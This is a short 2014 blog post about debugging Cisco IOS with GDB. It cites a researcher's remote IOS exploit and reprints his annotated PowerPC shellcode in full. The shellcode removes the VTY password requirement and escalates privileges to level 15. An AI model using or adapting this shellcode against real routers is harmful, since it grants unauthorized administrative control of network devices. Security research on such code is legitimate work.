April 24th, 2014

Step by Step Debugging Cisco IOS

This is kinda cool — I didn’t know that you could do this directly with GDB. Andy Davis has posted step-by-step instructions for debugging Cisco IOS with GDB. He’s done some other pretty interesting things lately, including posting a remote exploit of IOS, and as a follow-up to the exploit he posted information on how his IOS shellcode works.

Other than a minor GDB patch and a couple of idiosyncrasies with the debugging process (you have to manually replace the instructions overwritten by breakpoint interrupts), from his instructions it looks like it’s pretty straightforward to do. I’m not sure of the details on how it’s able to attach to the kernel, but I’d like to try it out sometime. I wonder if some of this info will spur other security people to do more IOS research.

Andy’s IOS shellcode:

.equ vty_info, 0x8182da60   // contains a pointer to the VTY info structure
.equ terminate, 0x80e4086c

lis 4,vty_info@ha           // load the high-adjusted half of the vty_info address
la 4,vty_info@l(4)          // add the low half to form the full address in r4
xor 8,8,8                   // Clear r8
lwzx 7,4,8                  // Get pointer to VTY info structure
stw 8,372(7)                // Write zero to first offset to remove
                            // the requirement to enter a password
subi 8,8,1                  // Set r8 to be 0xffffffff
addi 7,7,233                // Add second offset in two steps to
                            // avoid nulls in the shellcode
stw 8,1226(7)               // Write 0xffffffff to second offset to
                            // priv escalate to level 15
                            // (technically this should be 0xff100000
                            // but 0xffffffff works and is more efficient)
mr 3,8                      // Use 0xffffffff as a parameter
                            // to pass to terminate()
lis 4,terminate@ha          // load the address of terminate() into r4
la 4,terminate@l(4)
mtctr 4                     // move the target address into the count register
bctr                        // terminate "this process"
